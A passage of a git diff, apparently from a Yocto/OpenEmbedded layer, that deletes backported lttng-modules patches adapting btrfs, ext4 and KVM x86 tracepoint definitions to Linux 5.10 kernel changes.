43 find_free_extent: root=2(EXTENT_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
44 find_free_extent: root=1(ROOT_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
45
46Upstream-Status: Backport
47
48Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
49Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
50Change-Id: I1d674064d29b31417e2acffdeb735f5052a87032
51---
52 instrumentation/events/lttng-module/btrfs.h | 206 ++++++++++++--------
53 1 file changed, 122 insertions(+), 84 deletions(-)
54
55diff --git a/instrumentation/events/lttng-module/btrfs.h b/instrumentation/events/lttng-module/btrfs.h
56index 7b290085..52fcfd0d 100644
57--- a/instrumentation/events/lttng-module/btrfs.h
58+++ b/instrumentation/events/lttng-module/btrfs.h
59@@ -1856,7 +1856,29 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserved_extent, btrfs_reserved_extent_f
60
61 #endif /* #else #if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,10,0)) */
62
63-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0))
64+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0) || \
65+ LTTNG_KERNEL_RANGE(5,9,6, 5,10,0) || \
66+ LTTNG_KERNEL_RANGE(5,4,78, 5,5,0))
67+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
68+
69+ btrfs_find_free_extent,
70+
71+ TP_PROTO(const struct btrfs_root *root, u64 num_bytes, u64 empty_size,
72+ u64 data),
73+
74+ TP_ARGS(root, num_bytes, empty_size, data),
75+
76+ TP_FIELDS(
77+ ctf_array(u8, fsid, root->lttng_fs_info_fsid, BTRFS_UUID_SIZE)
78+ ctf_integer(u64, root_objectid, root->root_key.objectid)
79+ ctf_integer(u64, num_bytes, num_bytes)
80+ ctf_integer(u64, empty_size, empty_size)
81+ ctf_integer(u64, data, data)
82+ )
83+)
84+
85+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0))
86+
87 LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
88
89 btrfs_find_free_extent,
90@@ -1874,6 +1896,105 @@ LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
91 )
92 )
93
94+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,18,0))
95+
96+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
97+
98+ btrfs_find_free_extent,
99+
100+ TP_PROTO(const struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
101+ u64 data),
102+
103+ TP_ARGS(fs_info, num_bytes, empty_size, data),
104+
105+ TP_FIELDS(
106+ ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
107+ ctf_integer(u64, num_bytes, num_bytes)
108+ ctf_integer(u64, empty_size, empty_size)
109+ ctf_integer(u64, data, data)
110+ )
111+)
112+
113+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0))
114+
115+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
116+
117+ btrfs_find_free_extent,
118+
119+ TP_PROTO(const struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
120+ u64 data),
121+
122+ TP_ARGS(fs_info, num_bytes, empty_size, data),
123+
124+ TP_FIELDS(
125+ ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
126+ ctf_integer(u64, num_bytes, num_bytes)
127+ ctf_integer(u64, empty_size, empty_size)
128+ ctf_integer(u64, data, data)
129+ )
130+)
131+
132+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,10,0))
133+
134+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
135+
136+ btrfs_find_free_extent,
137+
138+ TP_PROTO(struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
139+ u64 data),
140+
141+ TP_ARGS(fs_info, num_bytes, empty_size, data),
142+
143+ TP_FIELDS(
144+ ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
145+ ctf_integer(u64, num_bytes, num_bytes)
146+ ctf_integer(u64, empty_size, empty_size)
147+ ctf_integer(u64, data, data)
148+ )
149+)
150+
151+#elif (LTTNG_SLE_KERNEL_RANGE(4,4,73,5,0,0, 4,4,73,6,0,0) || \
152+ LTTNG_SLE_KERNEL_RANGE(4,4,82,6,0,0, 4,4,82,7,0,0) || \
153+ LTTNG_SLE_KERNEL_RANGE(4,4,92,6,0,0, 4,4,92,7,0,0) || \
154+ LTTNG_SLE_KERNEL_RANGE(4,4,103,6,0,0, 4,5,0,0,0,0))
155+
156+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
157+
158+ btrfs_find_free_extent,
159+
160+ TP_PROTO(const struct btrfs_root *root, u64 num_bytes, u64 empty_size,
161+ u64 data),
162+
163+ TP_ARGS(root, num_bytes, empty_size, data),
164+
165+ TP_FIELDS(
166+ ctf_integer(u64, root_objectid, root->root_key.objectid)
167+ ctf_integer(u64, num_bytes, num_bytes)
168+ ctf_integer(u64, empty_size, empty_size)
169+ ctf_integer(u64, data, data)
170+ )
171+)
172+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(3,3,0))
173+
174+LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
175+
176+ btrfs_find_free_extent,
177+
178+ TP_PROTO(struct btrfs_root *root, u64 num_bytes, u64 empty_size,
179+ u64 data),
180+
181+ TP_ARGS(root, num_bytes, empty_size, data),
182+
183+ TP_FIELDS(
184+ ctf_integer(u64, root_objectid, root->root_key.objectid)
185+ ctf_integer(u64, num_bytes, num_bytes)
186+ ctf_integer(u64, empty_size, empty_size)
187+ ctf_integer(u64, data, data)
188+ )
189+)
190+#endif
191+
192+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,5,0))
193 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
194
195 TP_PROTO(const struct btrfs_block_group *block_group, u64 start,
196@@ -1907,22 +2028,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
197 )
198
199 #elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,18,0))
200-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
201-
202- btrfs_find_free_extent,
203-
204- TP_PROTO(const struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
205- u64 data),
206-
207- TP_ARGS(fs_info, num_bytes, empty_size, data),
208-
209- TP_FIELDS(
210- ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
211- ctf_integer(u64, num_bytes, num_bytes)
212- ctf_integer(u64, empty_size, empty_size)
213- ctf_integer(u64, data, data)
214- )
215-)
216
217 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
218
219@@ -1957,22 +2062,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
220 )
221
222 #elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0))
223-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
224-
225- btrfs_find_free_extent,
226-
227- TP_PROTO(const struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
228- u64 data),
229-
230- TP_ARGS(fs_info, num_bytes, empty_size, data),
231-
232- TP_FIELDS(
233- ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
234- ctf_integer(u64, num_bytes, num_bytes)
235- ctf_integer(u64, empty_size, empty_size)
236- ctf_integer(u64, data, data)
237- )
238-)
239
240 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
241
242@@ -2011,23 +2100,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
243
244 #elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,10,0))
245
246-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
247-
248- btrfs_find_free_extent,
249-
250- TP_PROTO(struct btrfs_fs_info *fs_info, u64 num_bytes, u64 empty_size,
251- u64 data),
252-
253- TP_ARGS(fs_info, num_bytes, empty_size, data),
254-
255- TP_FIELDS(
256- ctf_array(u8, fsid, lttng_fs_info_fsid, BTRFS_UUID_SIZE)
257- ctf_integer(u64, num_bytes, num_bytes)
258- ctf_integer(u64, empty_size, empty_size)
259- ctf_integer(u64, data, data)
260- )
261-)
262-
263 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
264
265 TP_PROTO(struct btrfs_fs_info *fs_info,
266@@ -2066,23 +2138,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
267 LTTNG_SLE_KERNEL_RANGE(4,4,92,6,0,0, 4,4,92,7,0,0) || \
268 LTTNG_SLE_KERNEL_RANGE(4,4,103,6,0,0, 4,5,0,0,0,0))
269
270-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
271-
272- btrfs_find_free_extent,
273-
274- TP_PROTO(const struct btrfs_root *root, u64 num_bytes, u64 empty_size,
275- u64 data),
276-
277- TP_ARGS(root, num_bytes, empty_size, data),
278-
279- TP_FIELDS(
280- ctf_integer(u64, root_objectid, root->root_key.objectid)
281- ctf_integer(u64, num_bytes, num_bytes)
282- ctf_integer(u64, empty_size, empty_size)
283- ctf_integer(u64, data, data)
284- )
285-)
286-
287 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
288
289 TP_PROTO(const struct btrfs_root *root,
290@@ -2120,23 +2175,6 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__reserve_extent, btrfs_reserve_extent_clus
291
292 #elif (LINUX_VERSION_CODE >= KERNEL_VERSION(3,3,0))
293
294-LTTNG_TRACEPOINT_EVENT_MAP(find_free_extent,
295-
296- btrfs_find_free_extent,
297-
298- TP_PROTO(struct btrfs_root *root, u64 num_bytes, u64 empty_size,
299- u64 data),
300-
301- TP_ARGS(root, num_bytes, empty_size, data),
302-
303- TP_FIELDS(
304- ctf_integer(u64, root_objectid, root->root_key.objectid)
305- ctf_integer(u64, num_bytes, num_bytes)
306- ctf_integer(u64, empty_size, empty_size)
307- ctf_integer(u64, data, data)
308- )
309-)
310-
311 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__reserve_extent,
312
313 TP_PROTO(struct btrfs_root *root,
314--
3152.25.1
316
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch b/meta/recipes-kernel/lttng/lttng-modules/0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch
deleted file mode 100644
index 67025418c3..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0004-fix-btrfs-make-ordered-extent-tracepoint-take-btrfs_.patch
+++ /dev/null
@@ -1,179 +0,0 @@
1From d51a3332909ff034c8ec16ead0090bd6a4e2bc38 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Tue, 27 Oct 2020 12:10:05 -0400
4Subject: [PATCH 04/16] fix: btrfs: make ordered extent tracepoint take
5 btrfs_inode (v5.10)
6
7See upstream commit :
8
9 commit acbf1dd0fcbd10c67826a19958f55a053b32f532
10 Author: Nikolay Borisov <nborisov@suse.com>
11 Date: Mon Aug 31 14:42:40 2020 +0300
12
13 btrfs: make ordered extent tracepoint take btrfs_inode
14
15Upstream-Status: Backport
16
17Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
18Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
19Change-Id: I096d0801ffe0ad826cfe414cdd1c0857cbd2b624
20---
21 instrumentation/events/lttng-module/btrfs.h | 120 +++++++++++++++-----
22 1 file changed, 90 insertions(+), 30 deletions(-)
23
24diff --git a/instrumentation/events/lttng-module/btrfs.h b/instrumentation/events/lttng-module/btrfs.h
25index 52fcfd0d..d47f3280 100644
26--- a/instrumentation/events/lttng-module/btrfs.h
27+++ b/instrumentation/events/lttng-module/btrfs.h
28@@ -346,7 +346,29 @@ LTTNG_TRACEPOINT_EVENT(btrfs_handle_em_exist,
29 )
30 #endif
31
32-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,6,0))
33+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
34+LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__ordered_extent,
35+
36+ TP_PROTO(const struct btrfs_inode *inode,
37+ const struct btrfs_ordered_extent *ordered),
38+
39+ TP_ARGS(inode, ordered),
40+
41+ TP_FIELDS(
42+ ctf_array(u8, fsid, inode->root->lttng_fs_info_fsid, BTRFS_UUID_SIZE)
43+ ctf_integer(ino_t, ino, btrfs_ino(inode))
44+ ctf_integer(u64, file_offset, ordered->file_offset)
45+ ctf_integer(u64, start, ordered->disk_bytenr)
46+ ctf_integer(u64, len, ordered->num_bytes)
47+ ctf_integer(u64, disk_len, ordered->disk_num_bytes)
48+ ctf_integer(u64, bytes_left, ordered->bytes_left)
49+ ctf_integer(unsigned long, flags, ordered->flags)
50+ ctf_integer(int, compress_type, ordered->compress_type)
51+ ctf_integer(int, refs, refcount_read(&ordered->refs))
52+ ctf_integer(u64, root_objectid, inode->root->root_key.objectid)
53+ )
54+)
55+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(5,6,0))
56 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__ordered_extent,
57
58 TP_PROTO(const struct inode *inode,
59@@ -458,7 +480,39 @@ LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__ordered_extent,
60 )
61 #endif
62
63-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0) || \
64+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
65+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_add,
66+
67+ TP_PROTO(const struct btrfs_inode *inode,
68+ const struct btrfs_ordered_extent *ordered),
69+
70+ TP_ARGS(inode, ordered)
71+)
72+
73+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_remove,
74+
75+ TP_PROTO(const struct btrfs_inode *inode,
76+ const struct btrfs_ordered_extent *ordered),
77+
78+ TP_ARGS(inode, ordered)
79+)
80+
81+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_start,
82+
83+ TP_PROTO(const struct btrfs_inode *inode,
84+ const struct btrfs_ordered_extent *ordered),
85+
86+ TP_ARGS(inode, ordered)
87+)
88+
89+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_put,
90+
91+ TP_PROTO(const struct btrfs_inode *inode,
92+ const struct btrfs_ordered_extent *ordered),
93+
94+ TP_ARGS(inode, ordered)
95+)
96+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0) || \
97 LTTNG_SLE_KERNEL_RANGE(4,4,73,5,0,0, 4,4,73,6,0,0) || \
98 LTTNG_SLE_KERNEL_RANGE(4,4,82,6,0,0, 4,4,82,7,0,0) || \
99 LTTNG_SLE_KERNEL_RANGE(4,4,92,6,0,0, 4,4,92,7,0,0) || \
100@@ -494,7 +548,41 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_put,
101
102 TP_ARGS(inode, ordered)
103 )
104+#else
105+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_add,
106+
107+ TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
108+
109+ TP_ARGS(inode, ordered)
110+)
111+
112+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_remove,
113+
114+ TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
115+
116+ TP_ARGS(inode, ordered)
117+)
118+
119+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_start,
120+
121+ TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
122+
123+ TP_ARGS(inode, ordered)
124+)
125
126+LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_put,
127+
128+ TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
129+
130+ TP_ARGS(inode, ordered)
131+)
132+#endif
133+
134+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,14,0) || \
135+ LTTNG_SLE_KERNEL_RANGE(4,4,73,5,0,0, 4,4,73,6,0,0) || \
136+ LTTNG_SLE_KERNEL_RANGE(4,4,82,6,0,0, 4,4,82,7,0,0) || \
137+ LTTNG_SLE_KERNEL_RANGE(4,4,92,6,0,0, 4,4,92,7,0,0) || \
138+ LTTNG_SLE_KERNEL_RANGE(4,4,103,6,0,0, 4,5,0,0,0,0))
139 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__writepage,
140
141 TP_PROTO(const struct page *page, const struct inode *inode,
142@@ -563,34 +651,6 @@ LTTNG_TRACEPOINT_EVENT(btrfs_sync_file,
143 )
144 )
145 #else
146-LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_add,
147-
148- TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
149-
150- TP_ARGS(inode, ordered)
151-)
152-
153-LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_remove,
154-
155- TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
156-
157- TP_ARGS(inode, ordered)
158-)
159-
160-LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_start,
161-
162- TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
163-
164- TP_ARGS(inode, ordered)
165-)
166-
167-LTTNG_TRACEPOINT_EVENT_INSTANCE(btrfs__ordered_extent, btrfs_ordered_extent_put,
168-
169- TP_PROTO(struct inode *inode, struct btrfs_ordered_extent *ordered),
170-
171- TP_ARGS(inode, ordered)
172-)
173-
174 LTTNG_TRACEPOINT_EVENT_CLASS(btrfs__writepage,
175
176 TP_PROTO(struct page *page, struct inode *inode,
177--
1782.25.1
179
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0005-fix-ext4-fast-commit-recovery-path-v5.10.patch b/meta/recipes-kernel/lttng/lttng-modules/0005-fix-ext4-fast-commit-recovery-path-v5.10.patch
deleted file mode 100644
index 63d97fa4a3..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0005-fix-ext4-fast-commit-recovery-path-v5.10.patch
+++ /dev/null
@@ -1,91 +0,0 @@
1From b96f5364ba4d5a8b9e8159fe0b9e20d598a1c0f5 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 26 Oct 2020 17:03:23 -0400
4Subject: [PATCH 05/16] fix: ext4: fast commit recovery path (v5.10)
5
6See upstream commit :
7
8 commit 8016e29f4362e285f0f7e38fadc61a5b7bdfdfa2
9 Author: Harshad Shirwadkar <harshadshirwadkar@gmail.com>
10 Date: Thu Oct 15 13:37:59 2020 -0700
11
12 ext4: fast commit recovery path
13
14 This patch adds fast commit recovery path support for Ext4 file
15 system. We add several helper functions that are similar in spirit to
16 e2fsprogs journal recovery path handlers. Example of such functions
17 include - a simple block allocator, idempotent block bitmap update
18 function etc. Using these routines and the fast commit log in the fast
19 commit area, the recovery path (ext4_fc_replay()) performs fast commit
20 log recovery.
21
22Upstream-Status: Backport
23
24Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
25Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
26Change-Id: Ia65cf44e108f2df0b458f0d335f33a8f18f50baa
27---
28 instrumentation/events/lttng-module/ext4.h | 40 ++++++++++++++++++++++
29 1 file changed, 40 insertions(+)
30
31diff --git a/instrumentation/events/lttng-module/ext4.h b/instrumentation/events/lttng-module/ext4.h
32index f9a55e29..5fddccad 100644
33--- a/instrumentation/events/lttng-module/ext4.h
34+++ b/instrumentation/events/lttng-module/ext4.h
35@@ -1423,6 +1423,18 @@ LTTNG_TRACEPOINT_EVENT(ext4_ext_load_extent,
36 )
37 )
38
39+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
40+LTTNG_TRACEPOINT_EVENT(ext4_load_inode,
41+ TP_PROTO(struct super_block *sb, unsigned long ino),
42+
43+ TP_ARGS(sb, ino),
44+
45+ TP_FIELDS(
46+ ctf_integer(dev_t, dev, sb->s_dev)
47+ ctf_integer(ino_t, ino, ino)
48+ )
49+)
50+#else
51 LTTNG_TRACEPOINT_EVENT(ext4_load_inode,
52 TP_PROTO(struct inode *inode),
53
54@@ -2045,6 +2057,34 @@ LTTNG_TRACEPOINT_EVENT(ext4_es_shrink_exit,
55
56 #endif
57
58+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
59+LTTNG_TRACEPOINT_EVENT(ext4_fc_replay_scan,
60+ TP_PROTO(struct super_block *sb, int error, int off),
61+
62+ TP_ARGS(sb, error, off),
63+
64+ TP_FIELDS(
65+ ctf_integer(dev_t, dev, sb->s_dev)
66+ ctf_integer(int, error, error)
67+ ctf_integer(int, off, off)
68+ )
69+)
70+
71+LTTNG_TRACEPOINT_EVENT(ext4_fc_replay,
72+ TP_PROTO(struct super_block *sb, int tag, int ino, int priv1, int priv2),
73+
74+ TP_ARGS(sb, tag, ino, priv1, priv2),
75+
76+ TP_FIELDS(
77+ ctf_integer(dev_t, dev, sb->s_dev)
78+ ctf_integer(int, tag, tag)
79+ ctf_integer(int, ino, ino)
80+ ctf_integer(int, priv1, priv1)
81+ ctf_integer(int, priv2, priv2)
82+ )
83+)
84+#endif
85+
86 #endif /* LTTNG_TRACE_EXT4_H */
87
88 /* This part must be outside protection */
89--
902.25.1
91
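--- a/meta/recipes-kernel/lttng/lttng-modules/0006-fix-KVM-x86-Add-intr-vectoring-info-and-error-code-t.patch
+++ /dev/null
@@ -1,124 +0,0 @@
-From a6334775b763c187d84914e89a0b835a793ae0fd Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Mon, 26 Oct 2020 14:11:17 -0400
-Subject: [PATCH 06/16] fix: KVM: x86: Add intr/vectoring info and error code
- to kvm_exit tracepoint (v5.10)
-
-See upstream commit :
-
- commit 235ba74f008d2e0936b29f77f68d4e2f73ffd24a
- Author: Sean Christopherson <sean.j.christopherson@intel.com>
- Date: Wed Sep 23 13:13:46 2020 -0700
-
- KVM: x86: Add intr/vectoring info and error code to kvm_exit tracepoint
-
- Extend the kvm_exit tracepoint to align it with kvm_nested_vmexit in
- terms of what information is captured. On SVM, add interrupt info and
- error code, while on VMX it add IDT vectoring and error code. This
- sets the stage for macrofying the kvm_exit tracepoint definition so that
- it can be reused for kvm_nested_vmexit without loss of information.
-
- Opportunistically stuff a zero for VM_EXIT_INTR_INFO if the VM-Enter
- failed, as the field is guaranteed to be invalid. Note, it'd be
- possible to further filter the interrupt/exception fields based on the
- VM-Exit reason, but the helper is intended only for tracepoints, i.e.
- an extra VMREAD or two is a non-issue, the failed VM-Enter case is just
- low hanging fruit.
-
-Upstream-Status: Backport
-
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
-Change-Id: I638fa29ef7d8bb432de42a33f9ae4db43259b915
----
- .../events/lttng-module/arch/x86/kvm/trace.h | 55 ++++++++++++++++++-
- 1 file changed, 53 insertions(+), 2 deletions(-)
-
-diff --git a/instrumentation/events/lttng-module/arch/x86/kvm/trace.h b/instrumentation/events/lttng-module/arch/x86/kvm/trace.h
-index 4416ae02..0917b51f 100644
---- a/instrumentation/events/lttng-module/arch/x86/kvm/trace.h
-+++ b/instrumentation/events/lttng-module/arch/x86/kvm/trace.h
-@@ -115,6 +115,37 @@ LTTNG_TRACEPOINT_EVENT_MAP(kvm_apic, kvm_x86_apic,
- /*
- * Tracepoint for kvm guest exit:
- */
-+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
-+LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
-+ TP_PROTO(unsigned int exit_reason, struct kvm_vcpu *vcpu, u32 isa),
-+ TP_ARGS(exit_reason, vcpu, isa),
-+
-+ TP_locvar(
-+ u64 info1, info2;
-+ u32 intr_info, error_code;
-+ ),
-+
-+ TP_code_pre(
-+ kvm_x86_ops.get_exit_info(vcpu, &tp_locvar->info1,
-+ &tp_locvar->info2,
-+ &tp_locvar->intr_info,
-+ &tp_locvar->error_code);
-+ ),
-+
-+ TP_FIELDS(
-+ ctf_integer(unsigned int, exit_reason, exit_reason)
-+ ctf_integer(unsigned long, guest_rip, kvm_rip_read(vcpu))
-+ ctf_integer(u32, isa, isa)
-+ ctf_integer(u64, info1, tp_locvar->info1)
-+ ctf_integer(u64, info2, tp_locvar->info2)
-+ ctf_integer(u32, intr_info, tp_locvar->intr_info)
-+ ctf_integer(u32, error_code, tp_locvar->error_code)
-+ ctf_integer(unsigned int, vcpu_id, vcpu->vcpu_id)
-+ ),
-+
-+ TP_code_post()
-+)
-+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0))
- LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
- TP_PROTO(unsigned int exit_reason, struct kvm_vcpu *vcpu, u32 isa),
- TP_ARGS(exit_reason, vcpu, isa),
-@@ -124,13 +155,32 @@ LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
- ),
-
- TP_code_pre(
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0))
- kvm_x86_ops.get_exit_info(vcpu, &tp_locvar->info1,
- &tp_locvar->info2);
-+ ),
-+
-+ TP_FIELDS(
-+ ctf_integer(unsigned int, exit_reason, exit_reason)
-+ ctf_integer(unsigned long, guest_rip, kvm_rip_read(vcpu))
-+ ctf_integer(u32, isa, isa)
-+ ctf_integer(u64, info1, tp_locvar->info1)
-+ ctf_integer(u64, info2, tp_locvar->info2)
-+ ),
-+
-+ TP_code_post()
-+)
- #else
-+LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
-+ TP_PROTO(unsigned int exit_reason, struct kvm_vcpu *vcpu, u32 isa),
-+ TP_ARGS(exit_reason, vcpu, isa),
-+
-+ TP_locvar(
-+ u64 info1, info2;
-+ ),
-+
-+ TP_code_pre(
- kvm_x86_ops->get_exit_info(vcpu, &tp_locvar->info1,
- &tp_locvar->info2);
--#endif
- ),
-
- TP_FIELDS(
-@@ -143,6 +193,7 @@ LTTNG_TRACEPOINT_EVENT_CODE_MAP(kvm_exit, kvm_x86_exit,
-
- TP_code_post()
- )
-+#endif
-
- /*
- * Tracepoint for kvm interrupt injection:
---
-2.25.1
-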
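--- a/meta/recipes-kernel/lttng/lttng-modules/0007-fix-kvm-x86-mmu-Add-TDP-MMU-PF-handler-v5.10.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 2f421c43c60b2c9d3ed63c1a363320e98a536a35 Mon Sep 17 00:00:00 2001
-From: Michael Jeanson <mjeanson@efficios.com>
-Date: Mon, 26 Oct 2020 14:28:35 -0400
-Subject: [PATCH 07/16] fix: kvm: x86/mmu: Add TDP MMU PF handler (v5.10)
-
-See upstream commit :
-
- commit bb18842e21111a979e2e0e1c5d85c09646f18d51
- Author: Ben Gardon <bgardon@google.com>
- Date: Wed Oct 14 11:26:50 2020 -0700
-
- kvm: x86/mmu: Add TDP MMU PF handler
-
- Add functions to handle page faults in the TDP MMU. These page faults
- are currently handled in much the same way as the x86 shadow paging
- based MMU, however the ordering of some operations is slightly
- different. Future patches will add eager NX splitting, a fast page fault
- handler, and parallel page faults.
-
- Tested by running kvm-unit-tests and KVM selftests on an Intel Haswell
- machine. This series introduced no new failures.
-
-Upstream-Status: Backport
-
-Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
-Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
-Change-Id: Ie56959cb6c77913d2f1188b0ca15da9114623a4e
----
- .../lttng-module/arch/x86/kvm/mmutrace.h | 20 ++++++++++++++++++-
- probes/lttng-probe-kvm-x86-mmu.c | 5 +++++
- 2 files changed, 24 insertions(+), 1 deletion(-)
-
-diff --git a/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h b/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
-index e5470400..86717835 100644
---- a/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
-+++ b/instrumentation/events/lttng-module/arch/x86/kvm/mmutrace.h
-@@ -163,7 +163,25 @@ LTTNG_TRACEPOINT_EVENT_INSTANCE(kvm_mmu_page_class, kvm_mmu_prepare_zap_page,
- TP_ARGS(sp)
- )
-
--#if (LINUX_VERSION_CODE >= KERNEL_VERSION(3,11,0))
-+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
-+
-+LTTNG_TRACEPOINT_EVENT_MAP(
-+ mark_mmio_spte,
-+
-+ kvm_mmu_mark_mmio_spte,
-+
-+ TP_PROTO(u64 *sptep, gfn_t gfn, u64 spte),
-+ TP_ARGS(sptep, gfn, spte),
-+
-+ TP_FIELDS(
-+ ctf_integer_hex(void *, sptep, sptep)
-+ ctf_integer(gfn_t, gfn, gfn)
-+ ctf_integer(unsigned, access, spte & ACC_ALL)
-+ ctf_integer(unsigned int, gen, get_mmio_spte_generation(spte))
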